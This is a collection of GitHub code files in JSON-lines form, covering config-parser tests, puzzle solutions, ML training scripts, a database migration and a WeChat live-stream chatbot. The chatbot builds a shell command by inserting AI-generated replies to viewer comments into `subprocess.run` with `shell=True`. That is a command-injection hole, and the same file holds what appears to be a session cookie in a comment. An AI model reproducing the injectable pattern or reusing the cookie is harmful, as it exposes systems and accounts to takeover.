turn interpolate an \"%(ENV:...)s\" style expansion.\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '''\n [DEFAULT]\n kw1 = %(kw2)s\n kw2 = %(ENV:UNDEFINED:-defval)s\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'defval')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'defval')\n\n #----------------------------------------------------------------------------\n def test_subclass_override(self):\n # test that subclasses that override `ConfigParser._interpolate`,\n # but that still directly call it, works...\n class SomeOtherConfigParser(ConfigParser):\n def _interpolate(self, section, option, rawval, vars):\n return ConfigParser._interpolate(self, section, option, rawval, vars)\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '''\n [DEFAULT]\n kw1 = %(kw2)s\n kw2 = %(ENV:SOMEVAL:-defval)s\n ''',\n }.items()}\n parser = SomeOtherConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'defval')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'defval')\n\n\n#------------------------------------------------------------------------------\n# end of $Id$\n# $ChangeLog$\n#------------------------------------------------------------------------------\n","repo_name":"jac241/anki_killstreaks","sub_path":"anki_killstreaks/_vendor/iniherit/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":18816,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"79"} +{"seq_id":"11497043326","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nsquares = []\nseed = (\n (8, 1, 6),\n (3, 5, 7),\n (4, 9, 2)\n)\n\ndef reflect(s):\n '''\n 
Returns a new square that is the reflected version of s.\n\n    Reflects across the identity diagonal. Any sort of reflect works since we\n    also rotate.\n\n    >>> reflect(((1, 2, 3),\n    ...          (4, 5, 6),\n    ...          (7, 8, 9)))\n    ((1, 4, 7), (2, 5, 8), (3, 6, 9))\n    '''\n    return tuple(zip(*s))\n\ndef rotate(s):\n    '''\n    Returns a new square that is s rotated 90 degrees clockwise.\n\n    >>> rotate(((1, 2, 3),\n    ...         (4, 5, 6),\n    ...         (7, 8, 9)))\n    ((7, 4, 1), (8, 5, 2), (9, 6, 3))\n    '''\n    return tuple(zip(*reversed(s)))\n\nfor _ in range(4):\n    seed = rotate(seed)\n    squares.append(seed)\nseed = reflect(seed)\nfor _ in range(4):\n    seed = rotate(seed)\n    squares.append(seed)\n\ndef squareDiff(a, b):\n    '''\n    Returns the sum of the absolute values of the differences between each item\n    in a and b.\n    '''\n    return sum(abs(a[i][j] - b[i][j]) for i in range(3) for j in range(3))\n\n# Complete the formingMagicSquare function below.\ndef formingMagicSquare(s):\n    '''\n    This is an inelegant question. It seems to require preconstructing all magic\n    squares ahead of time and comparing them.\n    '''\n    return min(squareDiff(square, s) for square in squares)\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    s = []\n\n    for _ in range(3):\n        s.append(list(map(int, input().rstrip().split())))\n\n    result = formingMagicSquare(s)\n\n    fptr.write(str(result) + '\\n')\n\n    fptr.close()\n","repo_name":"linkenneth/hacker-rank","sub_path":"magic-square-forming/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"21671026733","text":"import torch\r\nfrom torch import nn\r\nfrom REC.utils.enum_type import InputType\r\nfrom REC.model.basemodel import BaseModel\r\nimport numpy as np\r\nfrom torch.nn.init import xavier_normal_, constant_\r\nimport torch.nn.functional as F\r\n\r\n\r\n\r\nclass DVBPR(BaseModel):\r\n    input_type = InputType.PAIR\r\n    def __init__(self, config, dataload):\r\n        super(DVBPR, self).__init__()\r\n        \r\n        self.dropout_prob = config['dropout_prob']\r\n        self.embedding_size = config['embedding_size'] // 2\r\n        \r\n        self.device = config['device']\r\n        \r\n        self.user_num = dataload.user_num\r\n        self.item_num = dataload.item_num\r\n        # CNN for learned image features\r\n        \r\n        self.visual_encoder = CNNF(hidden_dim=self.embedding_size, dropout=self.dropout_prob) # CNN-F is a smaller CNN\r\n        \r\n        # Visual latent preference (theta)\r\n        self.theta_users = nn.Embedding(self.user_num, self.embedding_size)\r\n\r\n        # Latent factors (gamma)\r\n        self.gamma_users = nn.Embedding(self.user_num, self.embedding_size)\r\n        self.gamma_items = nn.Embedding(self.item_num, self.embedding_size)\r\n        \r\n        self.weight = torch.tensor([[1.0],[-1.0]]).to(self.device)\r\n        # Random weight initialization\r\n        self.reset_parameters()\r\n\r\n    \r\n    \r\n    def reset_parameters(self):\r\n        \"\"\" Reinitialize network weights using a uniform distribution. 
\"\"\"\n if isinstance(self.visual_encoder, CNNF):\n self.visual_encoder.reset_parameters()\n nn.init.uniform_(self.theta_users.weight) # Visual factors (theta)\n nn.init.uniform_(self.gamma_users.weight) # Visual factors (theta)\n nn.init.uniform_(self.gamma_items.weight) # Visual factors (theta)\n \n \n def forward(self, inputs):\n user, item_id, item_modal = inputs\n embed_id_user = self.gamma_users(user).unsqueeze(1) \n embed_id_item = self.gamma_items(item_id) \n\n embed_modal_user = self.theta_users(user).unsqueeze(1)\n embed_modal_item = self.visual_encoder(item_modal).view(user.shape[0], -1, self.embedding_size) #[5,2,32]\n\n score = (embed_id_user * embed_id_item).sum(-1) + \\\n (embed_modal_user * embed_modal_item).sum(-1) \n \n output = score.view(-1,2) \n batch_loss = -torch.mean(torch.log(torch.sigmoid(torch.matmul(output, self.weight))))\n return batch_loss\n\n\n\n @torch.no_grad()\n def predict(self, user,item_feature): \n embed_id_user = self.gamma_users(user) \n embed_id_item = self.gamma_items.weight \n\n embed_modal_user = self.theta_users(user)\n \n score = torch.matmul(embed_id_user,embed_id_item.t()) + \\\n torch.matmul(embed_modal_user,item_feature.t()) \n return score\n\n @torch.no_grad()\n def compute_item(self, item):\n return self.visual_encoder(item)\n\n\n\n\n\n\n\n\n\n\n\n\nclass CNNF(nn.Module):\n \"\"\"CNN-F network\"\"\"\n def __init__(self, hidden_dim=2048, fc_dim=512, weights=None, dropout=0.5):\n super(CNNF, self).__init__()\n self.hidden_dim = hidden_dim\n\n if weights is None:\n weights = {\n # conv layers: ((c_in, c_out, stride (square)), custom stride)\n 'cnn': [([3, 64, 11], [1, 4]),\n ([64, 256, 5], None),\n ([256, 256, 3], None),\n ([256, 256, 3], None),\n ([256, 256, 3], None)],\n \n # fc layers: n_in, n_out\n 'fc': [[256*22*2, fc_dim], # original: 256*7*7 -> 4096\n [fc_dim, fc_dim],\n [fc_dim, self.hidden_dim]]\n }\n\n self.convs = nn.ModuleList([nn.Conv2d(*params, padding_mode='replicate', stride=stride if stride else 1)\n for params, stride in weights['cnn']])\n \n self.fcs = nn.ModuleList([nn.Linear(*params) for params in weights['fc']])\n self.maxpool2d = nn.MaxPool2d(2)\n self.maxpool_idxs = [True, True, False, False, True] # CNN layers to maxpool\n self.dropout = nn.Dropout(p=dropout) \n self.layer_params = weights\n\n def forward(self, x):\n x = torch.reshape(x, shape=[-1, 3, 224, 224])\n\n # convolutional layers\n for cnn_layer, apply_maxpool in zip(self.convs, self.maxpool_idxs):\n x = F.relu(cnn_layer(x))\n # notable difference: original TF implementation has \"SAME\" padding\n x = self.maxpool2d(x) if apply_maxpool else x\n\n # fully connected layers\n x = torch.reshape(x, shape=[-1, self.layer_params['fc'][0][0]])\n for fc_layer in self.fcs:\n x = F.relu(fc_layer(x))\n x = self.dropout(x)\n\n return x\n\n def reset_parameters(self):\n for conv in self.convs:\n nn.init.xavier_uniform_(conv.weight)\n for fc in self.fcs:\n nn.init.xavier_uniform_(fc.weight)","repo_name":"westlake-repl/PixelRec","sub_path":"code/REC/model/VisualModel/dvbpr.py","file_name":"dvbpr.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"79"} +{"seq_id":"73011098496","text":"t = 0\npoints = []\n\ndef setup():\n size(600,600)\n noStroke()\n\ndef draw():\n global t, points\n background(255)\n translate(width/2,height/2)\n x, y = harmonograph(t)\n #save location to points List\n points.append([x,y])\n #go through points list and draw lines between them\n for i,p in 
enumerate(points):\n        stroke(0) #black\n        if i < len(points) - 1:\n            line(p[0],p[1],points[i+1][0],points[i+1][1])\n    t += .1\n    \ndef harmonograph(t):\n    a1, a2, a3, a4 = 100, 100, 100, 100 #amplitudes\n    f1, f2, f3, f4 = 3.01, 3, 3, 2 #frequencies\n    p1, p2, p3, p4 = -PI/2, 0, -PI/16, 0 #phase shifts\n    d1, d2, d3, d4 = 0.00085, 0.0065, 0 ,0 #decay constants\n    x = a1*cos(f1*t + p1)*exp(-d1*t) + a3*cos(f3*t + p3)*exp(-d3*t) \n    y = a2*sin(f2*t + p2)*exp(-d2*t) + a4*sin(f4*t + p4)*exp(-d4*t)\n    fill(0) #black\n    ellipse(x,y,5,5)\n    return x, y\n    \n    \n","repo_name":"decoy0ctopus/Mathematics-Experiments-w-Python","sub_path":"Harmonograph/Harmonograph.pyde","file_name":"Harmonograph.pyde","file_ext":"pyde","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"22574323354","text":"#%%import numpy as np\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nwriter = SummaryWriter()\nimport csv\n\nimport gym\nimport pybullet_envs.bullet as bul\n\nimport math\nimport time\nfrom td3_agent import ReplayBuffer, TD3Agent\nfrom collections import deque\n\n\nstart_timestep=1e4\n\nstd_noise=0.02\n\nenv = gym.make('Walker2DBulletEnv-v0')\nenv.render()\n\n# Set seeds\nseed = 12345\nenv.seed(seed)\ntorch.manual_seed(seed)\nnp.random.seed(seed)\n\nstate = env.reset()\nstate_dim = env.observation_space.shape[0]\naction_dim = env.action_space.shape[0] \nmax_action = float(env.action_space.high[0])\nthreshold = env.spec.reward_threshold\n\nprint('state_dim: ', state_dim, ', action_dim: ', action_dim)\nprint('max_action: ', max_action, ', threshold: ', threshold, ', std_noise: ', std_noise)\n\nagent = TD3Agent(state_dim, action_dim, max_action)\n\n# Twin Delayed Deep Deterministic (TD3) policy gradient algorithm\ndef td3_train(n_episodes=10000, print_env=10):\n\n    scores_deque = deque(maxlen=10)\n    scores_array = []\n    avg_scores_array = []    \n    best_score = -math.inf\n\n    time_start = time.time()        # Init start time\n    replay_buf = ReplayBuffer()     # Init ReplayBuffer\n    \n    timestep_after_last_save = 0\n    total_timesteps = 0\n    \n    low = env.action_space.low\n    high = env.action_space.high\n    \n    print(f'Low in action space: {low}, High: {high}, Action_dim: {action_dim}')\n    \n    for i_episode in range(1, n_episodes+1):\n        \n        timestep = 0\n        total_reward = 0\n        \n        # Reset environment\n        state = env.reset()\n        done = False\n\n        while done is False:\n            \n            # Select action randomly or according to policy\n            if total_timesteps < start_timestep:\n                action = env.action_space.sample()\n            else:\n                action = agent.select_action(np.array(state))\n                if std_noise != 0: \n                    shift_action = np.random.normal(0, std_noise, size=action_dim)\n                    action = (action + shift_action).clip(low, high)\n            \n            # Perform action\n            new_state, reward, done, _ = env.step(action) \n            done_bool = 0 if timestep + 1 == env._max_episode_steps else float(done)\n            total_reward += reward  # full episode reward\n\n            # Store every timestep in replay buffer\n            replay_buf.add((state, new_state, action, reward, done_bool))\n            state = new_state\n\n            timestep += 1     \n            total_timesteps += 1\n            timestep_after_last_save += 1\n\n        scores_deque.append(total_reward)\n        scores_array.append(total_reward)\n\n        avg_score = np.mean(scores_deque)\n        avg_scores_array.append(avg_score)\n        if total_reward > best_score:\n            best_score = total_reward\n            agent.save('Walker2D_3_std002', 'td3_best')\n\n        # train_by_episode(time_start, i_episode) \n        s = (int)(time.time() - time_start)\n        if i_episode % print_env == 0 or (len(scores_deque) 
== 10 and avg_score > threshold):\n            print('Ep. {}, Timestep {}, Ep.Timesteps {}, Score: {:.2f}, Avg.Score: {:.2f}, Best.Score: {:.2f}, Time: {:02}:{:02}:{:02} '\\\n                  .format(i_episode, total_timesteps, timestep, \\\n                          total_reward, avg_score, best_score, s//3600, s%3600//60, s%60)) \n\n        agent.train(replay_buf, timestep)\n        \n        if avg_score >= threshold:\n            print('Environment solved with Average Score: ', avg_score )\n\n        # Write to tensorboard\n        writer.add_scalar(\"average return\", total_reward, i_episode)\n\n    return scores_array, avg_scores_array\n\nscores, avg_scores = td3_train()\n\nagent.save('Walker2D_3_std002', 'td3_last')\nwriter.flush()\nwriter.close()\n\nwith open('td3_scores_1000episodes.csv', 'w') as file:\n    writer = csv.writer(file)\n    writer.writerow(scores)\n\n#%%","repo_name":"OkYongChoi/reinforcement-learning","sub_path":"TD3/td3_train.py","file_name":"td3_train.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"6272170156","text":"import cv2\r\nimport numpy as np\r\nimport os\r\n\r\n# -----------------------------------------------------------------\r\n# PVA-01\r\n# Script to extract symbols from a hand drawn raw image\r\n# the script needs to be run in the same directory as the raw image\r\n# Directory structure:\r\n# PVA-01\r\n# - Bilder\r\n#   - raw-symbols.png\r\n#   - squares\r\n#   - symbols\r\n# - generate.py\r\n# -----------------------------------------------------------------\r\n\r\n# Load the image\r\nimg = cv2.imread(\"Bilder/raw-symbols.png\")\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n# set size of the square\r\nsize = 100\r\n\r\n# set your name\r\nname = \"matthias.heimberg\"\r\n\r\n# path to store the extracted symbols\r\nsymbol_path = \"Bilder/symbols/\"\r\n# path to store the resized symbols (squares)\r\nsquare_path = \"Bilder/squares/\"\r\n\r\n# Threshold the image to a binary image\r\nret, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)\r\n\r\n# Find contours in the binary image\r\ncontours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n# Iterate through each contour and draw the bounding rectangle\r\nfor i, contour in enumerate(contours):\r\n    [x, y, w, h] = cv2.boundingRect(contour)\r\n    symbol = img[y:y + h, x:x + w]\r\n    cv2.imwrite(f\"{symbol_path}{i:02d}.png\", symbol)\r\n\r\n# Load all symbols and put each in the middle of a square\r\nfor j, filename in enumerate(os.listdir(symbol_path)):\r\n    prefix = '-' if j < 10 else 'x' if j < 20 else '+' if j < 30 else 'o' if j < 40 else '#'\r\n    img = cv2.imread(f\"{symbol_path}{filename}\")\r\n    h, w, _ = img.shape\r\n    new_h, new_w = (size, int(w * (size / h))) if h > w else (int(h * (size / w)), size)\r\n    symbol = cv2.resize(img, (new_w, new_h), cv2.INTER_AREA)\r\n    h, w, _ = symbol.shape\r\n    new_img = np.ones((size, size, 3), np.uint8) * 255\r\n    start_x = int(size / 2 - w / 2)\r\n    start_y = int(size / 2 - h / 2)\r\n    name = filename[:-4]\r\n    new_img[start_y:start_y + h, start_x:start_x + w] = symbol\r\n    cv2.imwrite(f\"{square_path}{prefix}-{name}-.png\", new_img)\r\n","repo_name":"heimberg/male-project","sub_path":"PVA-01/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"39705066590","text":"#!/usr/bin/env python3\nimport fileinput\n\n\ndef find(iterable, pred):\n    return next(filter(pred, iterable), None)\n\n\ndef length(l):\n    return lambda s: len(s) == l\n\n\ndef strsort(str):\n    return \"\".join(sorted(str))\n\n\ndef 
get_mapping(pattern):\n    mapping = {\n        1: find(pattern, length(2)),\n        4: find(pattern, length(4)),\n        7: find(pattern, length(3)),\n        8: find(pattern, length(7)),\n    }\n    mapping[9] = find(\n        pattern, lambda x: len(x) == 6 and set(x).issuperset(set(mapping[4]))\n    )\n    mapping[0] = find(\n        pattern,\n        lambda x: len(x) == 6\n        and set(x).issuperset(set(mapping[7]))\n        and x not in mapping.values(),\n    )\n    mapping[3] = find(\n        pattern,\n        lambda x: len(x) == 5\n        and len(set(x).intersection(set(mapping[7]))) == 3\n        and x not in mapping.values(),\n    )\n    mapping[6] = find(\n        pattern,\n        lambda x: len(x) == 6\n        and len(set(x).intersection(set(mapping[0]))) == 5\n        and x not in mapping.values(),\n    )\n    mapping[5] = find(\n        pattern,\n        lambda x: len(x) == 5\n        and len(set(x).intersection(set(mapping[9]))) == 5\n        and x not in mapping.values(),\n    )\n    mapping[2] = find(pattern, lambda x: x not in mapping.values())\n    return {strsort(v): k for k, v in mapping.items()}\n\n\ndef part1(data):\n    unique = set([2, 3, 4, 7])\n    return sum(len(digit) in unique for (_, output) in data for digit in output)\n\n\ndef part2(data):\n    result = []\n    for (pattern, output) in data:\n        mapping = get_mapping(pattern)\n        result.append(\n            sum(\n                mapping[strsort(val)] * pow(10, idx)\n                for idx, val in enumerate(reversed(output))\n            )\n        )\n    return sum(result)\n\n\ndef main():\n    data = [\n        tuple(part.split() for part in line.split(\"|\")) for line in fileinput.input()\n    ]\n    print(part1(data))\n    print(part2(data))\n\n\nmain()\n","repo_name":"lagerfeuer/AdventOfCode2021","sub_path":"day08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"8999356885","text":"import sys\nsys.stdin = open('미궁.txt', 'r')\n\n#N x M matrix: 1 means passable, 0 means blocked. What is the minimum number of cells to move through from (1,1) to (N,M)? 
Only up/down/left/right moves are allowed.\n\nfrom collections import deque\n\nlaby = []\nN, M = map(int, input().split())\n\nfor i in range(N):\n    laby.append(list(map(int,input())))\n\n\n# dx = [0,0,-1,1]\n# dy = [1,-1,0,0] # I assumed this was up/down/left/right, but it was actually right/left/up/down....\ndc = [0,0,-1,1]\ndr = [-1,1,0,0] # up, down, left, right\n\n# BFS from (0, 0): dist[r][c] counts the cells on the shortest path (start included);\n# a non-zero entry also marks the cell as visited, which prevents going back\ndist = [[0] * M for _ in range(N)]\ndist[0][0] = 1\nq = deque([(0, 0)])\n\nwhile q:\n    r, c = q.popleft()\n    for k in range(4):\n        nr = r + dr[k]\n        nc = c + dc[k]\n        if 0 <= nr < N and 0 <= nc < M and laby[nr][nc] == 1 and dist[nr][nc] == 0:\n            dist[nr][nc] = dist[r][c] + 1\n            q.append((nr, nc))\n\nprint(dist[N-1][M-1])\n","repo_name":"Raven712/TIL","sub_path":"6주/28일(회전, 브루트포스, 델타탐색)/s1_bj2178_labyrinth.py","file_name":"s1_bj2178_labyrinth.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"11896976392","text":"\"\"\"create account table\n\nRevision ID: 26979f2a8154\nRevises: \nCreate Date: 2021-08-25 13:43:56.270385+00:00\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '26979f2a8154'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.create_table(\n        'app_user',\n        sa.Column('id', sa.Integer, primary_key=True),\n        sa.Column('first_name', sa.Unicode(50)),\n        sa.Column('last_name', sa.Unicode(50)),\n        sa.Column('address', sa.Unicode(200)),\n        sa.Column('email', sa.String(50), nullable=False),\n    )\n\n\ndef downgrade():\n    op.drop_table('app_user')\n","repo_name":"Gusakovskiy/goit_python_web","sub_path":"module_9/simple_project/alembic/versions/26979f2a8154_init.py","file_name":"26979f2a8154_init.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
{"seq_id":"22943886409","text":"class Coordinate(object):\n    def __init__(self, x, y):\n        # Sets the x and y coordinates of the object\n        self.x = x\n        self.y = y\n\n    def distance(self, other):\n        # Returns the euclidean distance between two points\n        x_diff_sq = (self.x - other.x)**2\n        y_diff_sq = (self.y - other.y)**2\n        return (x_diff_sq + y_diff_sq)**0.5\n\n    def __str__(self):\n        # Special operator __str__ to return a string representation to the user when print(c) is called\n        return \"<{}, {}>\".format(self.x, self.y)\n\nc = Coordinate(3,4)\norigin = Coordinate(0,0)\n\nprint(c.distance(origin))\nprint(c)\nprint(type(c))\n","repo_name":"imharrisonking/MIT-OpenCourseWare","sub_path":"MIT-6.0001/week8-OOP/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"16474083685","text":"import csv,time,sys,signal\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport asyncio\r\nimport random\r\nfrom tkinter import *\r\nimport pygame\r\nimport openai\r\nfrom gtts import gTTS\r\nimport subprocess\r\nfrom collections import deque\r\nimport json\r\nimport requests\r\n\r\n\r\nclass wechatlive():\r\n\r\n    def __init__(self):\r\n        self.barrageList = {}\r\n        self.cookie_string = input(\"Please enter your cookie: \")\r\n        #self.cookie_string = 'promotewebsessionid=; sessionid=BgAAzr%2F%2FPx3Y80AxrWDWBpOOVnKoe%2Bg%2BrbeazJB8ndc1Lw01DiiiAO%2Fet56H%2BJAGTt5LHg57nCKCzQT9rByYJ639Hw%3D%3D; 
wxuin=1728252584'\r\n def Connect(self):#connect and listen\r\n chrome_options = webdriver.ChromeOptions()\r\n #chrome_options.add_argument(\"window-size=10,10\")\r\n #chrome_options.add_argument(\"--headless\") # hide the UI\r\n # absolute path to chromedriver (download the version matching your Chrome: http://chromedriver.storage.googleapis.com/index.html)\r\n driver_path = r'C:\\Users\\Administrator\\Downloads\\chromedriver_win32 (1)\\chromedriver.exe'\r\n # initialize a driver and point it at the chromedriver path\r\n driver = webdriver.Chrome(executable_path=driver_path,options = chrome_options)\r\n driver.get(\"https://channels.weixin.qq.com/platform/login\")\r\n # wait condition: the login page is found\r\n input_box = WebDriverWait(driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, '//*[@class=\"finder-page\"]'))\r\n )\r\n print(\"Loading cookie\")\r\n for i in range(10, 0, -1):\r\n time.sleep(0.5)\r\n percent_complete = (10 - i) * 10\r\n print(f\"{percent_complete}%\")\r\n cookie_list = self.cookie_string.split(\";\")\r\n for cookie in cookie_list:\r\n cookies = []\r\n name, value = cookie.split(\"=\",maxsplit=1)\r\n cookies = ({\r\n 'name': name.lstrip(),\r\n 'value': value\r\n })\r\n cookie_dict = {\r\n 'domain': 'channels.weixin.qq.com',\r\n 'name': cookies.get('name'),\r\n 'value': cookies.get('value'),\r\n #\"expires\": cookie.get('value'),\r\n 'path': '/',\r\n 'httpOnly': False,\r\n 'HostOnly': False,\r\n 'SameSite':None,\r\n 'Secure': True}\r\n driver.add_cookie(cookie_dict)\r\n driver.get('https://channels.weixin.qq.com/platform/live/liveBuild')\r\n # wait condition: the live page is found\r\n input_box = WebDriverWait(driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, '//*[@class=\"vue-recycle-scroller__item-wrapper\"]'))\r\n )\r\n last_data_id = None\r\n last_barrage = None\r\n while True: # infinite loop, pseudo-listening for new messages\r\n time.sleep(1) # wait 1 second for loading\r\n chat_room_list = driver.find_element(By.XPATH, '//*[@class=\"vue-recycle-scroller__item-wrapper\"]')\r\n chat_msgs = chat_room_list.find_elements(By.XPATH, '//*[@class=\"vue-recycle-scroller__item-view\"]')\r\n\r\n new_chat_msgs = []\r\n \r\n if last_data_id:\r\n for chat_msg in chat_msgs:\r\n if chat_msg.find_element(By.XPATH, './/div[@data-index]').get_attribute('data-index') == last_data_id:\r\n new_chat_msgs = chat_msgs[chat_msgs.index(chat_msg) + 1:]\r\n break\r\n else:\r\n new_chat_msgs = chat_msgs\r\n \r\n for chat_msg in new_chat_msgs:\r\n try:\r\n content = {} # initialize the bullet-comment content dict\r\n # check whether this is a message bullet comment\r\n try:\r\n #content[\"username\"] = chat_msg.find_element(By.CLASS_NAME, \"message-username-desc\").text\r\n content[\"msg\"] = chat_msg.find_element(By.CLASS_NAME, \"message-content\").text\r\n except:\r\n pass\r\n last_barrage = content\r\n except:\r\n continue\r\n\r\n if new_chat_msgs: \r\n last_data_id = new_chat_msgs[-1].find_element(By.XPATH, './/div[@data-index]').get_attribute('data-index')\r\n text= last_barrage['msg']\r\n openai.api_key = \"\"\r\n url = \"https://api.openai.com/v1/engines/davinci-codex/completions\"\r\n messages = [ {\"role\": \"system\", \"content\": \"You are the virtual streamer Xiaoyu-chan. Respond to the user's input in a cute way, cast cute magic on the viewers you reply to, and keep your answer under 100 characters\"},{\"role\": \"user\", \"content\": text}]\r\n\r\n response = openai.ChatCompletion.create(model=\"gpt-3.5-turbo\", messages=messages)\r\n answer = str(response['choices'][0]['message']['content'])\r\n print(answer)\r\n #self.putvoice(answer)\r\n #def putvoice(answer):\r\n # set the text to be synthesized\r\n #generate the TTS audio\r\n command = f'edge-tts --voice zh-CN-XiaoyiNeural --text \"{answer}\" --write-media output.mp3' # pass the AI-generated text to the edge-tts command\r\n subprocess.run(command, shell=True) # execute the command line\r\n # initialize Pygame\r\n pygame.mixer.init()\r\n # load the audio file\r\n pygame.mixer.music.load(\"output.mp3\")\r\n # play the audio\r\n pygame.mixer.music.play()\r\n # wait for the audio to finish playing\r\n while pygame.mixer.music.get_busy():\r\n pygame.time.Clock().tick(10)\r\n # quit the mixer and release the temporary audio file\r\n pygame.mixer.quit()\r\n \r\n\r\n\r\ndef QuitAndSave(signum, frame):#exit-signal handler\r\n print ('caught signal: %d' % signum)\r\n sys.exit(0)\r\n\r\nif __name__ == '__main__':#entry point\r\n #signal listeners\r\n signal.signal(signal.SIGTERM, QuitAndSave)\r\n signal.signal(signal.SIGINT, QuitAndSave)\r\n weobj = wechatlive()\r\n weobj.Connect()\r\n","repo_name":"smallnew666/ChatGPT-Virtual-Live","sub_path":"wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":6273,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"7"}
{"seq_id":"36981287873","text":"import random\nimport argparse\n\n\n# A class to represent items.\nclass Item:\n def __init__(self, colour):\n self._colour_ = colour\n\n def get_color(self) -> int:\n return self._colour_\n\n\n# A class to hold items.\nclass Container:\n def __init__(self, colour: int, max_items: int = 7):\n self._colour_ = colour\n self._max_item_count_ = max_items\n self._inside_ = []\n\n def add_item(self, p_item: Item) -> None:\n if self.check_item_color(p_item):\n if not self.is_full():\n self._inside_.append(p_item)\n else:\n raise Exception(\"The container is full.\")\n else:\n raise Exception(\"Given item has different colour.\")\n\n def is_full(self) -> bool:\n if len(self) >= self._max_item_count_:\n return True\n return False\n\n def get_color(self) -> int:\n return self._colour_\n\n def check_item_color(self, p_item: Item) -> bool:\n if self.get_color() == p_item.get_color():\n return True\n return False\n\n def __len__(self) -> int:\n return len(self._inside_)\n\n\n# A class to hold containers.\nclass ContainerList:\n def __init__(self):\n self._containers_ = []\n self._colour_indices_ = [-1, -1, -1]\n\n def add_item(self, p_item: Item) -> None:\n item_colour = p_item.get_color()\n container_index = self._get_container_from_colour_(item_colour)\n\n # If there is a container\n if container_index >= 0 and not (self._containers_[container_index]).is_full():\n container = self._containers_[container_index]\n container.add_item(p_item)\n return\n # Create a new container.\n new_container = Container(item_colour)\n self._add_container_(new_container)\n # Add item into that container.\n new_container.add_item(p_item)\n\n def show(self) -> str:\n print_text_header = '\\n############## ContainerList ##############\\n'\n print_text_body = ''\n print_text_footer = '###########################################\\n'\n\n # Print each container\n for container in self._containers_:\n if container.get_color() == 0:\n colour_name = 'Yellow'\n elif container.get_color() == 1:\n colour_name = 'Red'\n else:\n colour_name = 'White'\n print_text_body += f'- {colour_name} Container: {len(container)} items\\n'\n\n return print_text_header + print_text_body + print_text_footer\n\n def small_log(self) -> str:\n log_text = ''\n for container in self._containers_:\n log_text += f'{container.get_color()}({len(container)}) '\n return log_text\n\n def _add_container_(self, p_container: Container) -> None:\n prev_container_index = self._get_container_from_colour_(p_container.get_color())\n\n # If there is a previous container for that colour, it must be full\n if prev_container_index >= 0:\n prev_container = self._containers_[prev_container_index]\n if not prev_container.is_full():\n raise Exception(\"For the same colour, the previous container is not full yet.\")\n\n            
self._containers_.append(p_container)\n self._change_colour_index_(p_container.get_color(), len(self._containers_) - 1)\n\n def _get_container_from_colour_(self, p_colour: int) -> int:\n index = self._colour_indices_[p_colour]\n return index\n\n def _change_colour_index_(self, p_colour: int, p_index: int) -> None:\n self._colour_indices_[p_colour] = p_index\n\n def __len__(self):\n return len(self._containers_)\n\n\ndef init_argument_parser():\n parser = argparse.ArgumentParser(\n description=\"This script lets you to experiment the Bin Packing problem with Color constraint.\")\n parser.add_argument(\"-e\", \"--experiment\", nargs=\"+\", required=True, help=\"Provide the experiment count.\")\n parser.add_argument(\"-i\", \"--items\", nargs=\"+\", required=True, help=\"Provide the item count as number.\")\n parser.add_argument(\"-f\", \"--file\", nargs=\"+\", required=True, help=\"Provide a file name to save logs/results.\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n # Init the argument parser for flag system.\n args = init_argument_parser()\n\n # CONFIGURATIONS #\n EXPERIMENT_COUNT = int(args.experiment[0])\n ITEM_COUNT = int(args.items[0])\n FILENAME_TO_SAVE = args.file[0]\n array_to_store_data = []\n ##################\n\n # Start the simulation.\n print(\"Experiments are started.\")\n\n file_to_save = open(FILENAME_TO_SAVE, \"a\")\n # Do experiments.\n for test in 